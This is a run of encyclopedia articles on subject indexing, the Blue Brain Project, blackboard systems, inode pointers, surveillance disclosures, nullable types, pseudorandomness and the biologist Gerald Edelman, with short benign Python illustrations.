Automated extraction indexing may lead to loss of meaning by indexing single words as opposed to phrases. Although it is possible to extract commonly occurring phrases, it becomes more difficult if key concepts are inconsistently worded in phrases. Automated extraction indexing also has the problem that, even with use of a stop-list to remove common words, some frequent words may not be useful for discriminating between documents. For example, the term "glucose" is likely to occur frequently in any document related to diabetes, so using it as an index term would likely return most or all of the documents in the database. Post-coordinated indexing, where terms are combined at the time of searching, would reduce this effect, but the onus would be on the searcher to link appropriate terms rather than on the information professional. In addition, terms that occur infrequently may be highly significant: a new drug, for example, may be mentioned only rarely, but the novelty of the subject makes any reference significant. One method for allowing rarer terms to be included and common words to be excluded by automated techniques is a relative frequency approach, where the frequency of a word in a document is compared to its frequency in the database as a whole. A term that occurs more often in a document than might be expected based on the rest of the database can then be used as an index term, while terms that occur equally frequently throughout are excluded.
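The relative frequency approach described above can be sketched in a few lines of Python. This is an illustrative sketch, not a production indexing system; the tiny stop-list, the threshold, and the toy diabetes corpus are all assumptions made for the example.

```python
from collections import Counter

# A tiny illustrative stop-list; real systems use much larger ones.
STOP_WORDS = {"the", "and", "of", "in", "a", "to", "is"}

def extract_index_terms(document, corpus, ratio=1.5):
    """Suggest index terms: words whose relative frequency in the
    document exceeds `ratio` times their relative frequency in the
    database (corpus) as a whole."""
    doc = [w for w in document.lower().split() if w not in STOP_WORDS]
    all_words = [w for w in corpus.lower().split() if w not in STOP_WORDS]
    doc_freq, corpus_freq = Counter(doc), Counter(all_words)
    terms = []
    for word, count in doc_freq.items():
        doc_rate = count / len(doc)
        corpus_rate = corpus_freq[word] / len(all_words)
        if doc_rate > ratio * corpus_rate:
            terms.append(word)
    return sorted(terms)

# "glucose" is frequent everywhere in a diabetes database, so it is
# excluded even though it is frequent in this document.
corpus = ("glucose levels glucose therapy glucose measurement "
          "insulin regulates glucose insulin dose glucose")
document = "insulin regulates glucose insulin dose glucose"
terms = extract_index_terms(document, corpus)
```

Here "glucose" occurs at roughly the same rate in the document as in the whole database and is dropped, while "insulin" is over-represented in the document and is kept.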
Another problem with automated extraction is that it does not recognize when a concept is discussed but is not identified in the text by an indexable keyword.[5]
Since this process is based on simple string matching and involves no intellectual analysis, the resulting product is more appropriately known as a concordance than an index.
An alternative is assignment indexing, where index terms are taken from a controlled vocabulary. This has the advantage of controlling for synonyms, as the preferred term is indexed and synonyms or related terms direct the user to the preferred term. This means the user can find articles regardless of the specific term used by the author and saves the user from having to know and check all possible synonyms.[6] It also removes any confusion caused by homographs by inclusion of a qualifying term. A third advantage is that it allows the linking of related terms, whether they are linked by hierarchy or association; e.g., an index entry for an oral medication may list other oral medications as related terms on the same level of the hierarchy but would also link to broader terms such as treatment. Assignment indexing is used in manual indexing to improve inter-indexer consistency, as different indexers will have a controlled set of terms to choose from. Controlled vocabularies do not completely remove inconsistencies, as two indexers may still interpret the subject differently.[2]
The final phase of indexing is to present the entries in a systematic order. This may involve linking entries. In a pre-coordinated index the indexer determines the order in which terms are linked in an entry by considering how a user may formulate their search. In a post-coordinated index, the entries are presented singly and the user can link the entries through searches, most commonly carried out by computer software. Post-coordination results in a loss of precision in comparison to pre-coordination.[7]
Indexers must make decisions about what entries should be included and how many entries an index should incorporate. The depth of indexing describes the thoroughness of the indexing process with reference to exhaustivity and specificity.[8]
An exhaustive index is one which lists all possible index terms. Greater exhaustivity gives higher recall, that is, a greater likelihood of all the relevant articles being retrieved; however, this occurs at the expense of precision, meaning that the user may retrieve a larger number of irrelevant documents or documents which only deal with the subject in little depth. In a manual system, a greater level of exhaustivity brings with it a greater cost, as more man-hours are required; the additional time taken in an automated system is much less significant. At the other end of the scale, in a selective index only the most important aspects are covered.[9] Recall is reduced in a selective index: if an indexer does not include enough terms, a highly relevant article may be overlooked. Indexers should therefore strive for a balance and consider what the document may be used for, as well as the implications of time and expense.
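The recall/precision trade-off can be made concrete with a small calculation; the document IDs below are invented purely for illustration.

```python
def recall_precision(retrieved, relevant):
    """recall = fraction of relevant documents that were retrieved;
    precision = fraction of retrieved documents that are relevant."""
    retrieved, relevant = set(retrieved), set(relevant)
    hits = retrieved & relevant
    return len(hits) / len(relevant), len(hits) / len(retrieved)

# An exhaustively indexed collection returns every relevant document
# plus irrelevant ones: perfect recall, poor precision.
exhaustive = recall_precision(retrieved=[1, 2, 3, 4, 5, 6], relevant=[1, 2, 3])

# A selectively indexed collection returns little noise but misses a
# relevant document: perfect precision, reduced recall.
selective = recall_precision(retrieved=[1, 2], relevant=[1, 2, 3])
```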
Specificity describes how closely the index terms match the topics they represent.[10] An index is said to be specific if the indexer uses descriptors that parallel the concepts of the document and reflect those concepts precisely.[11] Specificity tends to increase with exhaustivity, as the more terms you include, the narrower those terms will be.
Hjørland (2011)[12] found that theories of indexing are at the deepest level connected to different theories of knowledge:
The core of indexing is, as stated by Rowley and Farrow,[16] to evaluate a paper's contribution to knowledge and index it accordingly; or, in the words of Hjørland (1992,[17] 1997), to index its informative potentials.
"In order to achieve good consistent indexing, the indexer must have a thorough appreciation of the structure of the subject and the nature of the contribution that the document is making to the advancement of knowledge" (Rowley & Farrow, 2000,[16]p. 99).
|
https://en.wikipedia.org/wiki/Subject_indexing
|
The Blue Brain Project was a Swiss brain research initiative that aimed to create a digital reconstruction of the mouse brain. The project was founded in May 2005 by the Brain Mind Institute of École Polytechnique Fédérale de Lausanne (EPFL) in Switzerland. The project ended in December 2024. Its mission was to use biologically detailed digital reconstructions and simulations of the mammalian brain to identify the fundamental principles of brain structure and function.
The project was headed by the founding director Henry Markram, who also launched the European Human Brain Project, and was co-directed by Felix Schürmann, Adriana Salvatore and Sean Hill. Using a Blue Gene supercomputer running Michael Hines's NEURON, the simulation involved a biologically realistic model of neurons[1][2][3] and an empirically reconstructed model connectome.
There were a number of collaborations, including the Cajal Blue Brain, coordinated by the Supercomputing and Visualization Center of Madrid (CeSViMa), and others run by universities and independent laboratories.
In 2006, the project made its first model of a neocortical column with simplified neurons.[4] In November 2007, it completed an initial model of the rat neocortical column. This marked the end of the first phase, delivering a data-driven process for creating, validating, and researching the neocortical column.[5][4][6]
Neocortical columns are considered by some researchers to be the smallest functional units of the neocortex,[7][8] and they are thought to be responsible for higher functions such as conscious thought. In humans, each column is about 2 mm (0.079 in) in length, has a diameter of 0.5 mm (0.020 in) and contains about 60,000 neurons. Rat neocortical columns are very similar in structure but contain only 10,000 neurons and 10⁸ synapses.
In 2009, Henry Markram claimed that a "detailed, functional artificial human brain can be built within the next 10 years".[9] He conceived the Human Brain Project, to which the Blue Brain Project contributed,[4] and which became funded in 2013 by the European Union with up to $1.3 billion.[10]
In 2015, the project simulated part of a rat brain with 30,000 neurons.[11] Also in 2015, scientists at École Polytechnique Fédérale de Lausanne (EPFL) developed a quantitative model of the previously unknown relationship between neurons and astrocytes. This model describes the energy management of the brain through the function of the neuro-glial vascular unit (NGV). The additional layer of neurons and glial cells was being added to Blue Brain Project models to improve the functionality of the system.[12]
In 2017, the Blue Brain Project discovered that neural cliques connected to one another in up to eleven dimensions. The project's director suggested that the difficulty of understanding the brain is partly because the mathematics usually applied for studying neural networks cannot detect that many dimensions. The Blue Brain Project was able to model these networks using algebraic topology.[13]
In 2018, the Blue Brain Project released its first digital 3D brain cell atlas,[14] which, according to ScienceDaily, is like "going from hand-drawn maps to Google Earth", providing information about major cell types, numbers, and positions in 737 regions of the brain.[15]
In 2019, Idan Segev, one of the computational neuroscientists working on the Blue Brain Project, gave a talk titled "Brain in the computer: what did I learn from simulating the brain". In his talk, he mentioned that the whole cortex for the mouse brain was complete and virtual EEG experiments would begin soon. He also mentioned that the model had become too heavy for the supercomputers they were using at the time, and that they were consequently exploring methods in which every neuron could be represented as an artificial neural network (see citation for details).[16]
In 2022, scientists at the Blue Brain Project used algebraic topology to create an algorithm, Topological Neuronal Synthesis, that generates a large number of unique cells using only a few examples, synthesizing millions of unique neuronal morphologies. This allows them to replicate both healthy and diseased states of the brain. In a paper Kenari et al. were able to digitally synthesize dendritic morphologies from the mouse brain using this algorithm. They mapped entire brain regions from just a few reference cells. Since it is open source, this will enable the modelling of brain diseases and eventually, the algorithm could lead to digital twins of brains.[17]
The Blue Brain Project developed a number of software tools to reconstruct and simulate the mouse brain. All tools mentioned below are open source and available on GitHub.[18][19][20][21][22][23]
Blue Brain Nexus[24][25][26] is a data integration platform which uses a knowledge graph to enable users to search, deposit, and organise data. It stands on the FAIR data principles to provide flexible data management solutions beyond neuroscience studies.
BluePyOpt[27] is a tool that is used to build electrical models of single neurons. For this, it uses evolutionary algorithms to constrain the parameters to experimental electrophysiological data. Attempts to reconstruct single neurons using BluePyOpt are reported by Rosanna Migliore[28] and Stefano Masori.[29]
CoreNEURON[30] is a supplemental tool to NEURON, which allows large scale simulation by improving memory efficiency and computational speed.
NeuroMorphoVis[31] is a visualisation tool for morphologies of neurons.
SONATA[32] is a joint effort between the Blue Brain Project and the Allen Institute for Brain Science to develop a standard data format, enabling a working environment across multiple platforms with greater computational memory and efficiency.
The project was funded primarily by the Swiss government and the Future and Emerging Technologies (FET) Flagship grant from the European Commission,[33] and secondarily by grants and donations from private individuals. The EPFL bought the Blue Gene computer at a reduced cost because it was still a prototype and IBM was interested in exploring how applications would perform on the machine. BBP was viewed as a validation of the Blue Gene supercomputer concept.[34]
Although the Blue Brain Project is often associated with the Human Brain Project (HBP), it is important to distinguish between the two. While the Blue Brain Project was a key participant in the HBP, much of the criticism regarding targets and management issues actually pertains to the Human Brain Project rather than the Blue Brain Project itself.[35][36]
Voices raised as early as September 2014 highlighted concerns over the trajectory of the Human Brain Project, noting challenges in meeting its high-level goals and questioning its organizational structure and the project's key promoter, Professor Henry Markram.[37][38] In 2016, the HBP underwent a restructuring, with resources originally earmarked for brain simulation redistributed to support a wider array of neuroscience research groups. Since then, scientists and engineers from the Blue Brain Project have contributed to various aspects of the HBP, including the Neuroinformatics, EBRAINS, Neurorobotics, and High-Performance Computing Platforms.[39] This distinction is important because some of the criticism directed at the initial incarnation of the HBP may have been misattributed to the Blue Brain Project due to their shared leadership and early involvement in the initiative.
The Cajal Blue Brain Project is coordinated by the Technical University of Madrid, led by Javier de Felipe, and uses the facilities of the Supercomputing and Visualization Center of Madrid and its supercomputer Magerit.[40] The Cajal Institute also participates in this collaboration. The main lines of research currently being pursued at Cajal Blue Brain include neurological experimentation and computer simulations.[41] Nanotechnology, in the form of a newly designed brain microscope, plays an important role in its research plans.[42]
Noah Hutton created the documentary film In Silico over a 10-year period. The film was released in April 2021.[43] The film covers the "shifting goals and landmarks"[44] of the Blue Brain Project as well as the drama: "In the end, this isn’t about science. It’s about the universals of power, greed, ego, and fame."[45][46]
|
https://en.wikipedia.org/wiki/Blue_Brain_Project
|
A blackboard system is an artificial intelligence approach based on the blackboard architectural model,[1][2][3][4] where a common knowledge base, the "blackboard", is iteratively updated by a diverse group of specialist knowledge sources, starting with a problem specification and ending with a solution. Each knowledge source updates the blackboard with a partial solution when its internal constraints match the blackboard state. In this way, the specialists work together to solve the problem. The blackboard model was originally designed as a way to handle complex, ill-defined problems, where the solution is the sum of its parts.
The following scenario provides a simple metaphor that gives some insight into how a blackboard functions:
A group of specialists are seated in a room with a large blackboard. They work as a team to brainstorm a solution to a problem, using the blackboard as the workplace for cooperatively developing the solution.
The session begins when the problem specifications are written onto the blackboard. The specialists all watch the blackboard, looking for an opportunity to apply their expertise to the developing solution. When someone writes something on the blackboard that allows another specialist to apply their expertise, the second specialist records their contribution on the blackboard, hopefully enabling other specialists to then apply their expertise. This process of adding contributions to the blackboard continues until the problem has been solved.
A blackboard-system application consists of three major components: the knowledge sources, which are independent specialist modules; the blackboard itself, a shared repository of problems, partial solutions, and other contributed information; and a control component, which manages the flow of problem-solving activity in the system.
A blackboard system is the central space in a multi-agent system. It is used for describing the world as a communication platform for agents. To realize a blackboard in a computer program, a machine-readable notation is needed in which facts can be stored. One option is a SQL database; another is the Learnable Task Modeling Language (LTML). The syntax of the LTML planning language is similar to PDDL, but adds extra features like control structures and OWL-S models.[5][6] LTML was developed in 2007[7] as part of a much larger project called POIROT (Plan Order Induction by Reasoning from One Trial),[8] which is a learning-from-demonstrations framework for process mining. In POIROT, plan traces and hypotheses are stored in the LTML syntax for creating semantic web services.[9]
Here is a small example: a human user is executing a workflow in a computer game. The user presses some buttons and interacts with the game engine. While the user interacts with the game, a plan trace is created; that is, the user's actions are stored in a logfile. The logfile is transformed into a machine-readable notation which is enriched with semantic attributes. The result is a text file in the LTML syntax which is put on the blackboard. Agents (software programs in the blackboard system) are able to parse the LTML syntax.
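The basic cycle of knowledge sources watching a shared space can be sketched minimally in Python. The knowledge sources and the word-counting "problem" below are invented purely for illustration; a real system such as POIROT stores far richer LTML structures on its blackboard.

```python
# Each knowledge source is a (precondition, action) pair: the action
# may run only when its precondition matches the blackboard state.
def split_into_words(bb):
    bb["words"] = bb["problem"].split()

def count_words(bb):
    bb["count"] = len(bb["words"])

knowledge_sources = [
    (lambda bb: "problem" in bb and "words" not in bb, split_into_words),
    (lambda bb: "words" in bb and "count" not in bb, count_words),
]

def run(blackboard, solved):
    """Control loop: fire any applicable knowledge source until the
    goal predicate reports the problem solved."""
    while not solved(blackboard):
        for precondition, action in knowledge_sources:
            if precondition(blackboard):
                action(blackboard)
                break
        else:
            raise RuntimeError("no knowledge source can contribute")
    return blackboard

result = run({"problem": "solve this problem together"},
             solved=lambda bb: "count" in bb)
```

Each contribution to the blackboard enables the next specialist, mirroring the metaphor above: no knowledge source calls another directly; they communicate only through the shared state.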
We start by discussing two well-known early blackboard systems, BB1 and GBB, and then discuss more recent implementations and applications.
The BB1 blackboard architecture[10] was originally inspired by studies of how humans plan to perform multiple tasks in a trip, which used task-planning as a simplified example of tactical planning for the Office of Naval Research.[11] Hayes-Roth & Hayes-Roth found that human planning was more closely modeled as an opportunistic process, in contrast to the primarily top-down planners used at the time:
While not incompatible with successive-refinement models, our view of planning is somewhat different. We share the assumption that planning processes operate in a two-dimensional planning space defined on time and abstraction dimensions. However, we assume that people's planning activity is largely opportunistic. That is, at each point in the process, the planner's current decisions and observations suggest various opportunities for plan development. The planner's subsequent decisions follow up on selected opportunities. Sometimes, these decision-sequences follow an orderly path and produce a neat top-down expansion as described above. However, some decisions and observations might also suggest less orderly opportunities for plan development.[12]
A key innovation of BB1 was that it applied this opportunistic planning model to its own control, using the same blackboard model of incremental, opportunistic, problem-solving that was applied to solve domain problems. Meta-level reasoning with control knowledge sources could then monitor whether planning and problem-solving were proceeding as expected or stalled. If stalled, BB1 could switch from one strategy to another as conditions – such as the goals being considered or the time remaining – changed. BB1 was applied in multiple domains: construction site planning,[13]inferring 3-D protein structures from X-ray crystallography,[14]intelligent tutoring systems,[15]and real-time patient monitoring.[16]
BB1 also allowed domain-general language frameworks to be designed for wide classes of problems. For example, the ACCORD[17]language framework defined a particular approach to solving configuration problems. The problem-solving approach was to incrementally assemble a solution by adding objects and constraints, one at a time. Actions in the ACCORD language framework appear as short English-like commands or sentences for specifying preferred actions, events to trigger KSes, preconditions to run a KS action, and obviation conditions to discard a KS action that is no longer relevant.
GBB[18] focused on efficiency, in contrast to BB1, which focused more on sophisticated reasoning and opportunistic planning. GBB improves efficiency by allowing blackboards to be multi-dimensional, where dimensions can be either ordered or not, and then by increasing the efficiency of pattern matching. GBB1,[19] one of GBB's control shells, implements BB1's style of control while adding efficiency improvements.
Other well-known early academic blackboard systems are the Hearsay II speech recognition system and Douglas Hofstadter's Copycat and Numbo projects.
Some more recent examples of deployed real-world applications include:
Blackboard systems are used routinely in many military C4ISTAR systems for detecting and tracking objects. Another example of current use is in game AI, where they are considered a standard tool for adding AI to video games.[22][23]
Blackboard-like systems have been constructed within modern Bayesian machine learning settings, using agents to add and remove Bayesian network nodes. In these "Bayesian blackboard" systems, the heuristics can acquire more rigorous probabilistic meanings as proposals and acceptances in Metropolis–Hastings sampling through the space of possible structures.[24][25][26] Conversely, using these mappings, existing Metropolis–Hastings samplers over structural spaces may now be viewed as forms of blackboard systems, even when not named as such by the authors. Such samplers are commonly found in musical transcription algorithms, for example.[27]
Blackboard systems have also been used to build large-scale intelligent systems for the annotation of media content, automating parts of traditional social science research. In this domain, the problem of integrating various AI algorithms into a single intelligent system arises spontaneously, with blackboards providing a way for a collection of distributed, modular natural language processing algorithms to each annotate the data in a central space, without needing to coordinate their behavior.[28]
|
https://en.wikipedia.org/wiki/Blackboard_system
|
The inode pointer structure is a structure adopted by the inode of a file in the Version 6 Unix file system, Version 7 Unix file system, and Unix File System (UFS) to list the addresses of a file's data blocks. It is also adopted by many related file systems, including the ext3 file system, popular with Linux users.
In the file system used in Version 6 Unix, an inode contains eight pointers:[1]
In the file system used in Version 7 Unix, an inode contains thirteen pointers:[2] ten direct pointers, one single indirect pointer, one double indirect pointer, and one triple indirect pointer.
In the Unix file system (UFS), an inode contains fifteen pointers:[3] twelve direct pointers, one single indirect pointer, one double indirect pointer, and one triple indirect pointer.
The levels of indirection indicate the number of pointers that must be followed before reaching the actual file data.
The structure is partially illustrated in the diagram accompanying this article. The structure allows inodes to describe very large files in file systems with a fixed logical block size. Central to the mechanism is that blocks of addresses (also called indirect blocks) are only allocated as needed. For example, in the Unix file system, a 12-block file would be described using just the inode, because its blocks fit into the number of direct pointers available. However, a 13-block file needs an indirect block to contain the thirteenth address.
The inode pointer structure not only allows for files to easily be allocated to non-contiguous blocks, it also allows the data at a particular location inside a file to be easily located. This is possible because the logical block size is fixed. For example, if each block is 8 kB, file data at 112 kB to 120 kB would be pointed to by the third pointer of the first indirect block (assuming twelve direct pointers in the inode pointer structure).
Unlike inodes, which are fixed in number and allocated in a special part of the file system, the indirect blocks may be of any number and are allocated in the same part of the file system as data blocks. The number of pointers in the indirect blocks is dependent on the block size and size of block pointers. Example: with a 512-byte block size, and 4-byte block pointers, each indirect block can consist of 128 (512 / 4) pointers.
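The offset arithmetic in the 8 kB example above can be sketched directly. This toy function (its name and return convention are invented for illustration) maps a byte offset within a file to the pointer that must be consulted, assuming twelve direct pointers as in UFS; double and triple indirection are omitted for brevity.

```python
def locate_pointer(offset, block_size=8192, n_direct=12, ptr_size=4):
    """Return ('direct', i) if the data block holding `offset` is
    addressed by the i-th direct pointer in the inode, or
    ('single_indirect', j) for the j-th pointer of the first
    indirect block."""
    block_index = offset // block_size
    if block_index < n_direct:
        return ("direct", block_index)
    block_index -= n_direct
    ptrs_per_block = block_size // ptr_size  # e.g. 8192 / 4 = 2048
    if block_index < ptrs_per_block:
        return ("single_indirect", block_index)
    raise NotImplementedError("double/triple indirection omitted")

# Data at 112 kB lands in logical block 14: past the twelve direct
# pointers, so it is reached via the third pointer (index 2) of the
# first indirect block, matching the example in the text.
where = locate_pointer(112 * 1024)
```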
|
https://en.wikipedia.org/wiki/Inode_pointer_structure
|
Global surveillance refers to the practice of globalized mass surveillance on entire populations across national borders.[1] Although its existence was first revealed in the 1970s and led legislators to attempt to curb domestic spying by the National Security Agency (NSA), it did not receive sustained public attention until the existence of ECHELON was revealed in the 1980s and confirmed in the 1990s.[2] In 2013 it gained substantial worldwide media attention due to the global surveillance disclosure by Edward Snowden.[3]
In 1972, NSA analyst Perry Fellwock (under the pseudonym "Winslow Peck") introduced the readers of Ramparts magazine to the NSA and the UKUSA Agreement.[4] In 1976, a separate article in Time Out magazine revealed the existence of GCHQ.[5]
In 1982, James Bamford's book about the NSA, The Puzzle Palace, was first published. Bamford's second book, Body of Secrets: Anatomy of the Ultra-Secret National Security Agency, was published two decades later.
In 1988, the ECHELON network was revealed by Margaret Newsham, a Lockheed employee. Newsham told a member of the U.S. Congress that the telephone calls of Strom Thurmond, a Republican U.S. senator, were being collected by the NSA. Congressional investigators determined that "targeting of U.S. political figures would not occur by accident. But was designed into the system from the start."[6]
By the late 1990s, ECHELON was reportedly capable of monitoring up to 90% of all internet traffic.[7] According to the BBC in May 2001, however, "The US Government still refused to admit that Echelon even exists."[7]
In the aftermath of the September 11 attacks, William Binney, along with colleagues J. Kirke Wiebe and Edward Loomis, and in cooperation with House staffer Diane Roark, asked the U.S. Defense Department to investigate the NSA for allegedly wasting "millions and millions of dollars" on Trailblazer, a system intended to analyze data carried on communications networks such as the Internet. Binney was also publicly critical of the NSA for spying on U.S. citizens after the September 11, 2001 attacks.[8] Binney claimed that the NSA had failed to uncover the 9/11 plot despite its massive interception of data.[9]
In 2001, after the September 11 attacks, MI5 started collecting bulk telephone communications data in the United Kingdom (i.e., which telephone numbers called each other and when), authorized by the Home Secretary under the Telecommunications Act 1984 instead of the Regulation of Investigatory Powers Act 2000, which would have brought independent oversight and regulation. This was kept secret until it was announced by the then Home Secretary in 2015.[10][11][12]
On December 16, 2005, The New York Times published a report under the headline "Bush Lets U.S. Spy on Callers Without Courts", co-written by Eric Lichtblau and the Pulitzer Prize-winning journalist James Risen. According to The Times, the article's publication was delayed for a year (past the next presidential election cycle) because of alleged national security concerns.[13] Russ Tice was later revealed as a major source.
In 2006, further details of the NSA's domestic surveillance of U.S. citizens were provided by USA Today. The newspaper released a report on May 11, 2006, detailing the NSA's "massive database" of phone records collected from "tens of millions" of U.S. citizens. According to USA Today, these phone records were provided by several telecom companies such as AT&T, Verizon, and BellSouth.[15] AT&T technician Mark Klein was later revealed as a major source, specifically regarding rooms at network control centers on the internet backbone that intercepted and recorded all traffic passing through. In 2008, the security analyst Babak Pasdar revealed the existence of the so-called "Quantico circuit" that he and his team had set up in 2003. The circuit provided the U.S. federal government with a backdoor into the network of an unnamed wireless provider, which was later independently identified as Verizon.[16]
In 2007, former Qwest CEO Joseph Nacchio alleged in court, with supporting documentation, that in February 2001 (nearly 7 months prior to the September 11 attacks) the NSA proposed in a meeting to conduct blanket phone spying. He considered the spying to be illegal and refused to cooperate, and claimed that the company was punished by being denied lucrative contracts.[17]
In 2011, details of the mass surveillance industry were released by WikiLeaks. According to Julian Assange, "We are in a world now where not only is it theoretically possible to record nearly all telecommunications traffic out of a country, all telephone calls, but where there is an international industry selling the devices now to do it."[18]
|
https://en.wikipedia.org/wiki/Global_surveillance_disclosures_(1970%E2%80%932013)
|
Nullable types are a feature of some programming languages which allow a value to be set to the special value NULL instead of the usual possible values of the data type. In statically typed languages, a nullable type is an option type,[citation needed] while in dynamically typed languages (where values have types, but variables do not), equivalent behavior is provided by having a single null value.
NULL is frequently used to represent a missing or invalid value, such as from a function that failed to return a value or a missing field in a database, as with NULL in SQL. In other words, NULL is undefined.
Primitive types such as integers and Booleans cannot generally be null, but the corresponding nullable types (nullable integer and nullable Boolean, respectively) can also assume the NULL value.[jargon][citation needed] This can be represented in ternary logic as FALSE, NULL, TRUE, as in three-valued logic.
An integer variable may represent integers, but 0 (zero) is a special case because 0 in many programming languages can mean "false". Also, this does not provide any notion of saying that the variable is empty, a need that arises in many circumstances. This need can be met with a nullable type. In programming languages like C# 2.0, a nullable integer, for example, can be declared by a question mark (int? x).[1][2]: 46 In programming languages like C# 1.0, nullable types can be defined by an external library[3] as new types (e.g. NullableInteger, NullableBoolean).[4]
A Boolean variable makes the effect more clear. Its values can be either "true" or "false", while a nullable Boolean may also contain a representation for "undecided". However, the interpretation or treatment of a logical operation involving such a variable depends on the language.
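One common interpretation, used by SQL among others, is Kleene three-valued logic. It can be sketched with Python's `Optional[bool]`, letting `None` stand in for the NULL/"undecided" value; the function name `and3` is invented for the example.

```python
from typing import Optional

def and3(a: Optional[bool], b: Optional[bool]) -> Optional[bool]:
    """Kleene three-valued AND: a definite False decides the result;
    otherwise any unknown (None) operand leaves it unknown."""
    if a is False or b is False:
        return False
    if a is None or b is None:
        return None
    return True

assert and3(True, True) is True
assert and3(False, None) is False  # a definite False dominates the unknown
assert and3(True, None) is None    # still undecided
```

Note that a language could legitimately choose a different treatment, e.g. raising an error on any NULL operand, which is why the text says the interpretation depends on the language.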
In contrast, object pointers can be set to NULL by default in most common languages, meaning that the pointer or reference points to nowhere and that no object is assigned (the variable does not point to any object). Nullable references were invented by C. A. R. Hoare in 1965 as part of the Algol W language. Hoare later described his invention as a "billion-dollar mistake".[5] This is because object pointers that can be NULL require the user to check the pointer before using it and to write specific code to handle the case when the object pointer is NULL.
Java has classes that correspond to scalar values, such as Integer, Boolean, and Float. Combined with autoboxing (automatic usage-driven conversion between object and value), this effectively allows nullable variables for scalar values.[citation needed]
Nullable type implementations usually adhere to the null object pattern.
There is a more general and formal concept that extends the nullable type concept: option types, which enforce explicit handling of the exceptional case.
The following programming languages support nullable types.
Statically typed languages with native null support include:
Statically typed languages with library null support include:
Dynamically-typed languages with null include:
|
https://en.wikipedia.org/wiki/Nullable_type
|
A pseudorandom sequence of numbers is one that appears to be statistically random, despite having been produced by a completely deterministic and repeatable process.[1] Pseudorandom number generators are often used in computer programming, as traditional sources of randomness available to humans (such as rolling dice) rely on physical processes not readily available to computer programs, although developments in hardware random number generator technology have challenged this.
The generation of random numbers has many uses, such as forrandom sampling,Monte Carlo methods,board games, orgambling. Inphysics, however, most processes, such as gravitational acceleration, are deterministic, meaning that they always produce the same outcome from the same starting point. Some notable exceptions areradioactive decayandquantum measurement, which are both modeled as being truly random processes in the underlying physics. Since these processes are not practical sources of random numbers, pseudorandom numbers are used, which ideally have the unpredictability of a truly random sequence, despite being generated by a deterministic process.[2]
In many applications, the deterministic process is acomputer algorithmcalled apseudorandom number generator, which must first be provided with a number called arandom seed. Since the same seed will yield the same sequence every time, it is important that the seed be well chosen and kept hidden, especially insecurityapplications, where the pattern's unpredictability is a critical feature.[3]
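The determinism of a seeded generator is easy to demonstrate. This Python sketch uses the standard library's `random.Random` (a Mersenne Twister generator); the seed values are arbitrary:

```python
import random

def sequence_from(seed: int, n: int = 5) -> list[int]:
    """Draw n pseudorandom integers from a generator initialised with `seed`."""
    rng = random.Random(seed)  # deterministic generator, fully fixed by the seed
    return [rng.randint(0, 99) for _ in range(n)]

# The same seed always reproduces the same sequence...
assert sequence_from(12345) == sequence_from(12345)
# ...while a different seed almost certainly yields a different one.
print(sequence_from(12345) != sequence_from(54321))
```

This reproducibility is desirable for debugging and simulation, but it is exactly why the seed must stay secret in security settings.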
In some cases where it is important for the sequence to be demonstrably unpredictable, physical sources of random numbers have been used, such as radioactive decay, atmospheric electromagnetic noise harvested from a radio tuned between stations, or intermixed timings of keystrokes.[1][4] The time investment needed to obtain these numbers leads to a compromise: using some of these physical readings as a seed for a pseudorandom number generator.
Before modern computing, researchers requiring random numbers would either generate them through various means (dice, cards, roulette wheels,[5] etc.) or use existing random number tables.
The first attempt to provide researchers with a ready supply of random digits was in 1927, when the Cambridge University Press published a table of 41,600 digits developed by L. H. C. Tippett. In 1947, the RAND Corporation generated numbers by the electronic simulation of a roulette wheel;[5] the results were eventually published in 1955 as A Million Random Digits with 100,000 Normal Deviates.
In theoretical computer science, a distribution is pseudorandom against a class of adversaries if no adversary from the class can distinguish it from the uniform distribution with significant advantage.[6] This notion of pseudorandomness is studied in computational complexity theory and has applications to cryptography.
Formally, let S and T be finite sets and let F = {f : S → T} be a class of functions. A distribution D over S is ε-pseudorandom against F if for every f in F, the statistical distance between the distributions f(X){\displaystyle f(X)} and f(Y){\displaystyle f(Y)}, where X{\displaystyle X} is sampled from D and Y{\displaystyle Y} is sampled from the uniform distribution on S, is at most ε.
In typical applications, the class F describes a model of computation with bounded resources and one is interested in designing distributions D with certain properties that are pseudorandom against F. The distribution D is often specified as the output of a pseudorandom generator.[7]
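As a toy numeric illustration of the ε definition (the distributions and the single test function here are invented for the example), one can compute the statistical distance between the images of a biased distribution and of the uniform distribution under a parity function on three bits:

```python
from itertools import product

def pushforward(dist, f):
    """Distribution of f(Z) when Z ~ dist (dist maps outcomes to probabilities)."""
    out = {}
    for z, p in dist.items():
        out[f(z)] = out.get(f(z), 0.0) + p
    return out

def statistical_distance(d1, d2):
    """Total variation distance between two finite distributions."""
    keys = set(d1) | set(d2)
    return 0.5 * sum(abs(d1.get(k, 0.0) - d2.get(k, 0.0)) for k in keys)

S = list(product([0, 1], repeat=3))
uniform = {s: 1 / len(S) for s in S}
# A biased distribution D: each bit is 1 with probability 0.6, independently.
biased = {s: (0.6 ** sum(s)) * (0.4 ** (3 - sum(s))) for s in S}

def parity(s):
    return sum(s) % 2  # the adversary only sees the parity of the bits

eps = statistical_distance(pushforward(biased, parity), pushforward(uniform, parity))
print(round(eps, 4))  # 0.004
```

Against a class F containing only this parity test, the biased distribution is 0.004-pseudorandom, even though it is easy to distinguish from uniform with richer tests.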
|
https://en.wikipedia.org/wiki/Pseudorandomness
|
Gerald Maurice Edelman (/ˈɛdəlmən/; July 1, 1929 – May 17, 2014) was an American biologist who shared the 1972 Nobel Prize in Physiology or Medicine for work with Rodney Robert Porter on the immune system.[1] Edelman's Nobel Prize-winning research concerned discovery of the structure of antibody molecules.[2] In interviews, he said that the way the components of the immune system evolve over the life of the individual is analogous to the way the components of the brain evolve in a lifetime. There is thus a continuity between his work on the immune system, for which he won the Nobel Prize, and his later work in neuroscience and in philosophy of mind.
Gerald Edelman was born in 1929[3] in Ozone Park, Queens, New York, to Jewish parents: physician Edward Edelman and Anna (née Freedman) Edelman, who worked in the insurance industry.[4] He studied violin for years, but eventually realized that he did not have the inner drive needed to pursue a career as a concert violinist, and decided to go into medical research instead.[5] He attended public schools in New York, graduating from John Adams High School,[6] and then attended Ursinus College, where he graduated magna cum laude with a B.S. in 1950. He received an M.D. from the University of Pennsylvania School of Medicine in 1954.[4]
After a year at the Johnson Foundation for Medical Physics, Edelman became a resident at the Massachusetts General Hospital; he then practiced medicine in France while serving with the US Army Medical Corps.[4] In 1957, Edelman joined the Rockefeller Institute for Medical Research as a graduate fellow, working in the laboratory of Henry Kunkel and receiving a Ph.D. in 1960.[4] The institute made him the assistant (later associate) dean of graduate studies; he became a professor at the school in 1966.[4] In 1992, he moved to California and became a professor of neurobiology at The Scripps Research Institute.[7]
